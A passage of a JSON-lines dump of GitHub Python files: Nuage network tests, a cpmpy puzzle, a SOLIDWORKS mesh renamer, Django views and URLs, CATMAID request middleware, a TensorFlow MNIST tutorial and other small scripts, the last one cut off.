self.nuage_vsd_client.get_vsd_external_id(fipsub4['id'])\n nuage_fipsubnet4 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(nuage_fipsubnet2[0]['parentID'],\n nuage_fipsubnet4[0]['parentID'])\n self.delete_uplink_key_from_plugin_file()\n\n def test_multi_fipsubs_with_uplinkID_in_file_and_uplinksub_no_parentID(self):\n # Create gateway, port and vlan on VSD\n self.create_gateway_port_vlan()\n # Create uplink subnet without passing parentID\n self.create_uplink_subnet()\n # place parentID in plugin file\n # and restart the neutron\n self.add_uplink_key_to_plugin_file(self.uplinksubnet[0]['parentID'])\n fipsub1 = self.create_fip_subnet('172.40.0.0/24')\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub1['id'])\n nuage_fipsubnet1 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub1['id'], nuage_fipsubnet1[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet1[0]['parentID'])\n fipsub2 = self.create_fip_subnet('182.40.0.0/24')\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub2['id'])\n nuage_fipsubnet2 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub2['id'], nuage_fipsubnet2[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet2[0]['parentID'])\n # delete all the fipsubnets and create a new one\n self.delete_fip_subnet(fipsub1['id'])\n self.delete_fip_subnet(fipsub2['id'])\n \n #create a third fipsubnet\n fipsub3 = self.create_fip_subnet('192.40.0.0/24')\n self.addCleanup(self.delete_fip_subnet, fipsub3['id'])\n fip_extID = self.nuage_vsd_client.get_vsd_external_id(fipsub3['id'])\n nuage_fipsubnet3 = self.nuage_vsd_client.get_sharedresource(\n filters='externalID', filter_value= fip_extID)\n self.assertEqual(fipsub3['id'], nuage_fipsubnet3[0]['name'])\n self.assertEqual(self.uplinksubnet[0]['parentID'],\n nuage_fipsubnet3[0]['parentID'])\n\n self.delete_uplink_key_from_plugin_file()\n\n","repo_name":"greenpau/nuage-tempest","sub_path":"nuagetempest/thirdparty/nuage/test_nuage_uplink_fipsubnet_connectivity_model.py","file_name":"test_nuage_uplink_fipsubnet_connectivity_model.py","file_ext":"py","file_size_in_byte":17169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6954878560","text":"\"\"\"\nMrs Timkin's Age problem in cpmpy.\n\nFrom \nhttp://www.comp.nus.edu.sg/~henz/projects/puzzles/arith/index.html\n'''\nMrs Timpkin's Age from 'Amusements in Mathematics, Dudeney', number 43.\n\nWhen the Timpkinses married eighteen years ago, Timpkins was three\ntimes as old as his wife, and today he is just twice as old as she.\nHow old is Mrs. Timpkin? \n'''\n\nAnswer:\n Mr. Timpkin age: 72\n Mrs Timpkin age: 36\n\nModel created by Hakan Kjellerstrand, hakank@hakank.com\nSee also my cpmpy page: http://www.hakank.org/cpmpy/\n\n\"\"\"\nimport sys\nimport numpy as np\nfrom cpmpy import *\nfrom cpmpy.solvers import *\nfrom cpmpy_hakank import *\n\n\n\n\ndef timpkin(married_years_ago_fixed=0):\n \n model = Model()\n\n\n # variables\n # At least 18 years old\n t = intvar(18,100,name=\"Mr. 
Timpkin age\")\n w = intvar(18,100,name=\"Mrs Timpkin age\")\n \n # This could - of course - be a constant (18)\n # but it might interesting/funny/instructive \n # to also let it be a decision variable.\n # Note that this will give non-legal (in legal terms)\n # marriages if we don't restrict the domains above.\n married_years_ago = intvar(0,100,name=\"Married years ago\")\n if married_years_ago_fixed > 0:\n model += (married_years_ago == married_years_ago_fixed)\n \n model += (t - married_years_ago == 3 * (w - married_years_ago))\n model += (t == 2*w)\n\n def print_sol():\n print(\"t:\",t.value(), \"w:\",w.value())\n\n ss = CPM_ortools(model)\n num_solutions = ss.solveAll(display=print_sol)\n print(\"num_solutions:\", num_solutions) \n\n\nprint(\"The stated puzzle:\")\ntimpkin(18)\nprint()\nprint(\"No fixed marriage-when-ago age:\")\ntimpkin()\n","repo_name":"hakank/hakank","sub_path":"cpmpy/timpkin.py","file_name":"timpkin.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":339,"dataset":"github-code","pt":"7"} +{"seq_id":"15234588271","text":"#This script was written by SigmaRelief\n#Version 1.0.0 2020-06-22\n#https://github.com/SigmaRelief/SOLIDWORKS-Export-to-Mesh\n\n# importing required modules \nfrom zipfile import ZipFile\nimport io\nimport os\nimport tempfile\nimport sys \n\ndef updateZip(zipname, filename, data):\n # generate a temp file\n tmpfd, tmpname = tempfile.mkstemp(dir=os.path.dirname(zipname))\n os.close(tmpfd)\n\n # create a temp copy of the archive without filename \n with ZipFile(zipname, 'r') as zin:\n with ZipFile(tmpname, 'w') as zout:\n zout.comment = zin.comment # preserve the comment\n for item in zin.infolist():\n if item.filename != filename:\n zout.writestr(item, zin.read(item.filename))\n\n # replace with the temp archive\n os.remove(zipname)\n os.rename(tmpname, zipname)\n\n # now add filename with its new data\n with ZipFile(zipname, 'a') as zf:\n zf.writestr(filename, data)\n\n\n#variables\nfile_path = sys.argv[1]\nfile_name = os.path.basename(file_path)\ninner_file_path = \"3D/\"\ninner_file_name = \"3dmodel.model\"\n\nwith ZipFile(file_path, 'r') as archive:\n\n with io.TextIOWrapper(archive.open(inner_file_path + inner_file_name), encoding=\"utf-8\") as f:\n f_content = f.readlines()\n\n #calculated variables\n sizeoflist = len(f_content)\n\n body_count = 0\n body_id = 1\n file_name_noex = file_name[:-4]\n\n #count number of bodies in file\n for i in range(sizeoflist):\n line = f_content[i]\n body_count = body_count + line.count(\"\"\" name=\"body\"\"\")\n\n #loop through entire file to replace name\n for i in range(sizeoflist):\n match_start = 0\n line = f_content[i]\n\n #check for matches\n while match_start >= 0:\n match_start = line.find(\"\"\" name=\"body\"\"\")\n match_end = line.find(\"\"\"\" \"\"\", match_start + 8)\n\n #if multiple bodies edit line\n if match_start > 0 and body_count > 1:\n line = line[0:match_start + 7] + file_name_noex + \"-\" + str(body_id) + line[match_end:]\n body_id += 1\n\n #if single body edit line\n if match_start > 0 and body_count == 1:\n line = line[0:match_start + 7] + file_name_noex + line[match_end:]\n\n #store edited line\n f_content[i] = line\n\nformat_content = (\"\".join(f_content))\nformat_content = format_content.replace(\"\\n\", \"\\r\\n\")\n\nupdateZip(file_path, inner_file_path + inner_file_name, format_content)","repo_name":"SigmaRelief/SOLIDWORKS-Export-to-Mesh","sub_path":"Export to Mesh.py","file_name":"Export to 
Mesh.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"14767811247","text":"import torch\nimport numpy as np\nfrom datetime import datetime\n\ndef LOG_INFO(msg):\n now = datetime.now()\n display_now = str(now).split(' ')[1][:-3]\n print(display_now + ' ' + msg)\n\ndef load_train_data(index):\n fx = 'data/train_x{}.npy'.format(index)\n fy = 'data/train_y{}.npy'.format(index)\n train_x = np.load(fx)\n train_y = np.load(fy)\n return train_x,train_y\n\ndef load_test_data():\n test_x = np.load('data/test_x2.npy')\n test_y = np.load('data/test_y2.npy')\n test_x = np.load(fx)\n test_y = np.load(fy)\n return test_x,test_y\n\ndef read_train_name(index):\n with open('data/train_name{}.yaml'.format(index),'r') as f:\n train_name = yaml.load(f)\n return train_name\n\ndef read_test_name():\n with open('data/test_name.yaml','r') as f:\n test_name = yaml.load(f)\n return test_name","repo_name":"llk2why/RetinaSample","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"28044155759","text":"def is_square(vertices):\r\n if (len(vertices) != 4): return False\r\n else: \r\n \tedge = points_distance(vertices[0], vertices[1])\r\n \tif(edge != points_distance(vertices[0], vertices[3])): return False\r\n \telif(edge != points_distance(vertices[1], vertices[2])): return False\r\n \telif((edge*2**0.5) != points_distance(vertices[0], vertices[2])): return False\r\n \telse: return True\r\n\r\n\r\ndef get_area(vertices):\r\n area = 0\r\n for x in range(0, len(vertices)):\r\n \tarea+=(vertices[x][0]*vertices[(x+1)%len(vertices)][1]-vertices[x][1]*vertices[(x+1)%len(vertices)][0])\r\n area = abs(area/2)\r\n if(area == 0): area = int(area)\r\n return area\r\n\r\n\r\ndef points_distance(a, b):\r\n c = ((a[0]-b[0])**2 + (a[1]-b[1])**2)**0.5\r\n return c\r\n\r\n\r\ndef verticify(line):\r\n braceless = line.replace(\"(\", \"\").replace(\")\", \"\")\r\n pairs = braceless.split(\" \")\r\n tuples = [(x.split(\",\")) for x in pairs]\r\n numbers = [(int(x), int(y)) for x,y in tuples]\r\n return numbers\r\n\r\ndef process(input_path, output_path):\r\n file_in = open(input_path, \"r\")\r\n file_out = open(output_path, \"w\")\r\n same_square = False\r\n list_sizes = []\r\n for line in file_in:\r\n \tx = verticify(line)\r\n \tfile_out.write(str(get_area(x)) + \"\\n\")\r\n \tif(is_square(x) == True):\r\n \t\tif(get_area(x) == y for y in list_sizes): same_square = True\r\n \t\telse: list_sizes.append(get_area(x))\r\n file_out.write(str(same_square))\r\n file_out.close()\r\n file_in.close()\r\n\r\nprocess('input.txt', 'output.txt')\r\n","repo_name":"Spodah/pythonpractices","sub_path":"polygon_area.py","file_name":"polygon_area.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73072020702","text":"from django.shortcuts import redirect\nfrom django.views.generic import TemplateView\nfrom django.core.mail import send_mail\nfrom reservation.models import RoomModel\nfrom django.db.models import Max\n\n\nclass IndexView(TemplateView):\n template_name = 'main/index.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['max_peoples'] = range(0, int(RoomModel.objects.aggregate(Max('max_people'))['max_people__max'])+1)\n context['room_type'] = 
['Basic', 'Premium']\n        return context\n\n\ndef contact_message(request):\n    if request.method == 'POST':\n        name = request.POST['name']\n        email = request.POST['email']\n        message = request.POST['message']\n        message = f\"Message from {name} - {email} \\n {message} \"\n        send_mail('Contact message',\n                  message,\n                  'grekovdima7@gmail.com',\n                  ['grekovdima7@gmail.com'])\n    return redirect('main:index')\n","repo_name":"DmitriiGrekov/delux_hotel","sub_path":"deluxhotel/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"23781121616","text":"\"\"\"djangoProject URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n    https://docs.djangoproject.com/en/3.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n    1. Add an import:  from my_app import views\r\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\r\nClass-based views\r\n    1. Add an import:  from other_app.views import Home\r\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n    1. Import the include() function: from django.urls import include, path\r\n    2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path, include\r\nfrom projectApp import views\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\n\r\nurlpatterns = [\r\n\r\n\r\n    # links pages\r\n    path('admin/', admin.site.urls),\r\n    path('', include('projectApp.urls')),\r\n    path(\"flower/daisy/\", views.DaisyInformation, name=\"daisyInformation\"),\r\n    path(\"flower/blanketFlower/\", views.BlanketFlower, name=\"blanketflower\"),\r\n    path(\"flower/buttercup/\", views.Buttercup, name=\"buttercup\"),\r\n    path(\"flower/carnation/\", views.Carnation, name=\"carnation\"),\r\n    path(\"flower/dandelion/\", views.Dandelion, name=\"dandelion\"),\r\n    path(\"flower/cornpoppy/\", views.CornPoppy, name=\"cornpoppy\"),\r\n    path(\"flower/lotus/\", views.Lotus, name=\"lotus\"),\r\n    path(\"flower/marigold/\", views.Marigold, name=\"marigold\"),\r\n    path(\"flower/sunflower/\", views.Sunflower, name=\"sunflower\"),\r\n    path(\"flower/rose/\", views.Rose, name=\"rose\"),\r\n    path('flower/upload/', views.upload_file, name=\"uploader\"),\r\n    path('display/', views.filter, name=\"display\"),\r\n\r\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n\r\nif settings.DEBUG:\r\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"buchita/djangoPythonAnywhere","sub_path":"djangoProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"3288911435","text":"'''\n    Convert a list of tuples to an ndarray\n'''\n\nimport numpy as np\n\nx = [(1, 2, 3), (4, 5)]\na = np.asarray(x)\nprint(a)\nprint(\"--------------------\")\n\ny = [1, 2, 3]\nb = np.asarray(y, dtype=float)\nprint(b)\n","repo_name":"Guangxingtianxia/numpy_study","sub_path":"从已有的数组创建数组/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"2644895994","text":"# tensorflow gitbook tutorial\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# load mnist data\nmnist = 
input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\n# it makes only one layer\n# x is data: None rows(depends on the num of mnist data) with 784(28 * 28) columns\nx = tf.placeholder(tf.float32, [None, 784])\n\n# W is a parameter place: weight\nW = tf.Variable(tf.zeros([784, 10]))\n# b is a bias\nb = tf.Variable(tf.zeros([10]))\n\n# y is an answer from our layer\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n# Y_ is a right answer label\ny_ = tf.placeholder(tf.float32, [None, 10])\n\n# cross_entropy holds information of how bad the result is\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n\n# uses Gradient Descent strategy with 0.5 learning rate to minimize cross_entropy\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\n# initialize variables of tensorflow\ninit = tf.global_variables_initializer()\n\n# make a ssesion\nsess = tf.Session()\nsess.run(init)\n\nfor i in range(1000):\n # take 100 data randomly\n batch_xs, batch_ys = mnist.train.next_batch(100)\n # then train with this mini batch of 100 data\n sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\n# array of true or false\ncorrect_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))\n\n# array of true or false is casted to array of integer that then can be reduced to make a mean value\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nprint(sess.run(accuracy, feed_dict={x: mnist.test.images, y_: mnist.test.labels}))\n","repo_name":"brightparagon/learn-machine-learning","sub_path":"tensorflow-tutorial/mnist/begin_mnist.py","file_name":"begin_mnist.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"7871286142","text":"from pytorch_lightning import LightningModule\n\nfrom .classification_training import ClassificationTraining\nfrom .segmentation_training import SegmentationTraining\n\nmodules = [\n SegmentationTraining,\n ClassificationTraining,\n]\nmodules_dict = {m.__name__: m for m in modules}\n\n\ndef get_training_module(module_name: str) -> LightningModule:\n assert (\n module_name in modules_dict.keys()\n ), f\"{module_name} not in {modules_dict.keys()}\"\n return modules_dict[module_name]\n","repo_name":"POSTECH-CVLab/NeRF-Downstream","sub_path":"co3d_3d/src/modules/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"7"} +{"seq_id":"37169967305","text":"import numpy as np \n\nfrom cmsis_stream.cg.scheduler import *\nfrom cmsis_stream.cg.yaml import *\n\n\nclass Processing(GenericNode):\n def __init__(self,name,outLength):\n GenericNode.__init__(self,name)\n self.addInput(\"i\",CType(Q15),outLength)\n self.addOutput(\"o\",CType(Q15),outLength)\n\n @property\n def typeName(self):\n return \"Processing\"\n\n\nBUFSIZE=128\n### Define nodes\nsrc=VHTSource(\"src\",BUFSIZE,0)\nprocessing=Processing(\"proc\",BUFSIZE)\nsink=VHTSink(\"sink\",BUFSIZE,0)\n\n\ng = Graph()\n\ng.connect(src.o, processing.i)\ng.connect(processing.o, sink.i)\n\n\n\nprint(\"Generate graphviz and code\")\n\n\n\nconf=Configuration()\nconf.CMSISDSP = True\n\nexport_graph(g,\"graph.yml\")\nexport_config(conf,\"config.yml\")\n\nwith open(\"pre_schedule_test.dot\",\"w\") as f:\n g.graphviz(f)\n \nsched = g.computeSchedule(conf)\nprint(\"Schedule length = %d\" % sched.scheduleLength)\nprint(\"Memory usage %d bytes\" % 
sched.memory)\n\n\nsched.pythoncode(\".\",config=conf)\n\nwith open(\"test.dot\",\"w\") as f:\n sched.graphviz(f)\n\n","repo_name":"ARM-software/CMSIS-Stream","sub_path":"Examples/example7_python/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"9122329828","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport cProfile\nimport pstats\nimport logging\n\nfrom traceback import format_exc\nfrom datetime import datetime\n\nfrom django.http import JsonResponse, Http404\nfrom django.conf import settings\n\nfrom guardian.utils import get_anonymous_user\n\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.exceptions import APIException\n\nfrom catmaid.error import ClientError\n\nfrom io import StringIO\n\n\nlogger = logging.getLogger(__name__)\n\nclass AuthenticationHeaderExtensionMiddleware(object):\n \"\"\"\n CATMAID uses the `X-Authorization` HTTP header rather than `Authorization`\n to prevent conflicts with, e.g., HTTP server basic authentication.\n\n Have Django overwrite the `Authorization` header with the `X-Authorization`\n header, if present, so that other middlewares can work normally.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n auth = request.META.get('HTTP_X_AUTHORIZATION', b'')\n if auth:\n request.META['HTTP_AUTHORIZATION'] = auth\n return self.get_response(request)\n\n\nclass CsrfBypassTokenAuthenticationMiddleware(object):\n \"\"\"\n Authenticate a user using a HTTP_AUTHORIZATION header token provided by\n Django Rest Framework's authtoken. If successful, set a protected request\n property to make Django's CSRF view middleware not enforce the presence\n of a CSRF header.\n\n This is necessary to have DRF's token authentication work both with its\n API views and normal Django views.\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n try:\n token_auth = TokenAuthentication().authenticate(request)\n if token_auth:\n request.user = token_auth[0]\n request.auth = token_auth[1]\n request._dont_enforce_csrf_checks = True\n request._is_token_authenticated = True\n except:\n pass\n\n return self.get_response(request)\n\n\nclass AnonymousAuthenticationMiddleware(object):\n \"\"\" This middleware class tests whether the current user is the\n anonymous user. 
If so, it replaces the request.user object with\n    Guardian's anonymous user and monkey patches it to behave like\n    Django's anonymous user.\n    \"\"\"\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n    def __call__(self, request):\n        if request.user.is_anonymous:\n            request.user = get_anonymous_user()\n        return self.get_response(request)\n\n\nclass AjaxExceptionMiddleware(object):\n    \"\"\"Catch exceptions and wrap them in a JSON response.\n    \"\"\"\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n    def __call__(self, request):\n        return self.get_response(request)\n\n    def process_exception(self, request, exception):\n        response = {\n            'error': str(exception),\n            'detail': format_exc(),\n            'type': type(exception).__name__,\n            'meta': getattr(exception, 'meta', None),\n        }\n        if settings.DEBUG:\n            import sys\n            import traceback\n            (exc_type, exc_info, tb) = sys.exc_info()\n            response['info'] = str(exc_info)\n            response['traceback'] = ''.join(traceback.format_tb(tb))\n\n        # Some CATMAID errors have a more detailed status code\n        if isinstance(exception, ClientError):\n            status = exception.status_code\n        elif isinstance(exception, Http404):\n            status = 404\n        elif isinstance(exception, APIException):\n            status = exception.status_code\n        elif isinstance(exception, ValueError):\n            # Value errors are assumed to be problems with the request/client.\n            status = 400\n        else:\n            status = 500\n\n        return JsonResponse(response, status=status, safe=False)\n\n\nclass BasicModelMapMiddleware(object):\n    \"\"\"Redirect requests to stacks and projects to alternative models that will\n    fetch information from other sources. If the url_prefix field is set, it is\n    prepended to request URLs.\n    \"\"\"\n\n    url_prefix = ''\n    stack_info_pattern = re.compile(r'^/.+/stack/.+/info$')\n    stacks_pattern = re.compile(r'/.+/stacks')\n    datastores_pattern = re.compile(r'/client/datastores/.*/')\n    annotations_patterns = re.compile(r'/.+/annotations/')\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n    def __call__(self, request):\n        new_path = (request.path == '/projects/') or \\\n            self.stack_info_pattern.search(request.path) or \\\n            self.stacks_pattern.search(request.path) or \\\n            self.datastores_pattern.search(request.path) or \\\n            self.annotations_patterns.search(request.path)\n\n\n        if new_path:\n            request.path_info = self.url_prefix + request.path_info\n            request.path = self.url_prefix + request.path\n\n        return self.get_response(request)\n\n\nclass JaneliaRenderMiddleware(BasicModelMapMiddleware):\n    \"\"\"Let this middleware redirect requests for stacks and projects to\n    Janelia render web service models.\n    \"\"\"\n\n    url_prefix = '/janelia-render'\n\n\nclass DVIDMiddleware(BasicModelMapMiddleware):\n    \"\"\"Let this middleware redirect requests for stacks and projects to a DVID\n    instance.\n    \"\"\"\n\n    url_prefix = '/dvid'\n\n\nclass ProfilingMiddleware(object):\n    \"\"\"This middleware will create a cProfile log file for a view request if\n    'profile' is part of the request URL, which can be done by simply attaching\n    '?profile' to a regular view URL. Returned is a JsonResponse object,\n    containing the original data and the profile. Optionally, if the request has\n    a field called 'profile-to-disk', the profile is saved to a file in /tmp,\n    with a name following the pattern 'catmaid-hostaddress-timestamp.profile'.\n    \"\"\"\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n\n        # This middleware conflicts with expected unit test results. 
Warn about\n        # this if this is executed in test mode.\n        if getattr(settings, 'TESTING_ENVIRONMENT', False):\n            logger.warning(\"The ProfilingMiddleware is used during testing. \"\n                    \"This will result in broken tests, because of unexpected \"\n                    \"response content.\")\n\n    def __call__(self, request):\n        profile = 'profile' in request.GET or 'profile' in request.POST\n\n        no_content = False\n        if profile:\n            no_content = 'profile-no-content' in request.GET or \\\n                    'profile-no-content' in request.POST\n            request.profiler = cProfile.Profile()\n            request.profiler.enable()\n\n        response = self.get_response(request)\n\n        if profile:\n            request.profiler.disable()\n            s = StringIO()\n            sortby = getattr(request, 'profile-sorting', 'cumulative')\n            ps = pstats.Stats(request.profiler, stream=s).sort_stats(sortby)\n            ps.print_stats()\n            data = {\n                'profile': s.getvalue()\n            }\n            if not no_content:\n                data['content'] = response.content\n\n            response = JsonResponse(data)\n\n            if hasattr(request, 'profile-to-disk'):\n                request.profiler.dump_stats(f'/tmp/catmaid-{request.META[\"REMOTE_ADDR\"]}-{datetime.now()}.profile')\n\n        return response\n\n\nclass NewRelicMiddleware(object):\n    \"\"\"This middleware will log additional properties to New Relic and expects\n    the newrelic python module to be installed.\n    \"\"\"\n\n    def __init__(self, get_response):\n        self.get_response = get_response\n        # Import this locally, so that we don't clutter general imports and require\n        # it only when it is used.\n        self.newrelic = __import__('newrelic.agent')\n\n    def __call__(self, request):\n        exec_ctx = request.META.get('HTTP_X_CATMAID_EXECUTION_CONTEXT', b'')\n        if not exec_ctx:\n            exec_ctx = 'unknown'\n        self.newrelic.agent.add_custom_parameter('execution_context', exec_ctx)\n\n        return self.get_response(request)\n","repo_name":"catmaid/CATMAID","sub_path":"django/applications/catmaid/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"7"}
+{"seq_id":"41659819408","text":"#!/usr/bin/python3\n\"\"\"This module defines unittests for Square\n\"\"\"\n\n\nfrom unittest import TestCase\nfrom models.square import Square\n\n\nclass SquareTest(TestCase):\n    \"\"\"Test suite for Square class\n    \"\"\"\n\n    def test_size_is_height_and_width(self):\n        square = Square(4)\n        self.assertEqual(square.size, square.height)\n        self.assertEqual(square.width, square.height)\n\n    def tests_square_string_representation(self):\n        square = Square(5, 7, 9, id=10)\n        sqr_str = '[Square] (10) 7/9 - 5'\n        self.assertEqual(str(square), sqr_str)\n\n    def test_square_size_setter_getter(self):\n        square = Square(5, 7, 9, id=10)\n        self.assertEqual(square.size, 5)\n        square.size = 10\n        self.assertEqual(square.size, 10)\n\n    def test_square_size_with_wrong_value(self):\n        square = Square(5, 7, 9, id=10)\n\n        with self.assertRaises(TypeError) as err:\n            square.size = \"5\"\n        self.assertEqual(\n            str(err.exception),\n            \"width must be an integer\"\n        )\n\n        with self.assertRaises(ValueError) as err:\n            square.size = -5\n        self.assertEqual(\n            str(err.exception),\n            \"width must be > 0\"\n        )\n\n    def test_square_update_args(self):\n        sqr = Square(5, 7, 3, 22)\n        sqr.update(9)\n        self.assertEqual(sqr.id, 9)\n        sqr.update(9, 4)\n        self.assertEqual(sqr.size, 4)\n        sqr.update(9, 4, 10)\n        self.assertEqual(sqr.x, 10)\n        sqr.update(9, 4, 10, 8)\n        self.assertEqual(sqr.y, 8)\n\n    def test_square_update_kwargs(self):\n        sqr = Square(11, 3, 2, 13)\n        sqr.update(id=20)\n        self.assertEqual(sqr.id, 20)\n        
sqr.update(size=21)\n self.assertEqual(sqr.size, 21)\n sqr.update(x=7, y=18)\n self.assertEqual(sqr.x, 7)\n self.assertEqual(sqr.y, 18)\n\n def test_square_update_args_over_kwargs(self):\n sqr = Square(11, 3, 2, 13)\n sqr.update(25, id=18)\n self.assertEqual(sqr.id, 25)\n\n def test_square_to_dict(self):\n sqr = Square(34, 3, 7, id=40)\n sqr_dict = {\n 'size': 34, 'x': 3, 'y': 7, 'id': 40\n }\n\n self.assertEqual(\n sqr_dict,\n sqr.to_dictionary()\n )\n\n self.assertEqual(\n type(sqr.to_dictionary()),\n dict\n )\n\n with self.assertRaises(TypeError):\n sqr.to_dictionary(5)\n\n def test_square_create(self):\n sqr = Square(3, 4, 7, 8)\n sqr_dict = sqr.to_dictionary()\n sqr2 = sqr.create(**sqr_dict)\n sqr2_dict = sqr2.to_dictionary()\n\n self.assertEqual(sqr_dict, sqr2_dict)\n","repo_name":"Idris01/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33279164606","text":"from django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.category_view,name=\"index\"),\n path(\"update/\",views.update_category_details,name=\"update_category_details\"),\n path(\"delete_category//\",views.delete_category,name=\"delete_category\"),\n path(\"delete_product//\",views.delete_product,name=\"delete_product\"),\n path(\"product_detail//\",views.product_detail,name=\"product_detail\"),\n path(\"logout/\",views.Userlogout,name=\"logout\")\n]","repo_name":"Pranav0707/HeadStrait-Full-Stack-Assignment","sub_path":"Categories/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42249507755","text":"#!/usr/bin/python3\n\nimport pandas as pd\nimport subprocess\nimport shlex\nfrom platform import system\nimport sys\n\n__all__ = [\"get_data\", \"normalize_particular_columns\"]\n\nDATA_FOLDER = \"./data\"\n\ndef read_column_names(file):\n with open(file, 'r') as f:\n content = f.readlines()\n \n return [x.strip() for x in content]\n\ndef delete_mostly_nan_columns(df):\n column_names = list()\n all_entries = len(df.index)\n nan_values = df.isnull().sum().to_numpy()\n\n for i in range(len(nan_values)):\n if (nan_values[i]/all_entries)>=0.3:\n column_names.append(df.columns[i])\n\n for name in column_names:\n if name in df.columns:\n del df[name]\n\ndef get_data(city_name): \n columns_names = read_column_names('./data/header.txt')\n if system() != \"Linux\":\n sys.exit(\"Only linux is supported\")\n \n subprocess.call(shlex.split(f'./get_files.sh {city_name}'))\n df_smt = pd.read_csv(f'./data/s_m_t_{city_name}.csv', names=columns_names[1:], index_col=False)\n delete_mostly_nan_columns(df_smt)\n return df_smt\n\ndef normalize_particular_columns(df, column_names):\n for col_name in column_names:\n df.iloc[:,col_name]=(df.iloc[:,col_name]-df.iloc[:,col_name].mean())/df.iloc[:,col_name].std()","repo_name":"9albert6/mkird","sub_path":"weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28721395539","text":"from nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import stopwords\nfrom collections import Counter\nimport re,string\nexclude = set(string.punctuation)\nprint (exclude)\nfile 
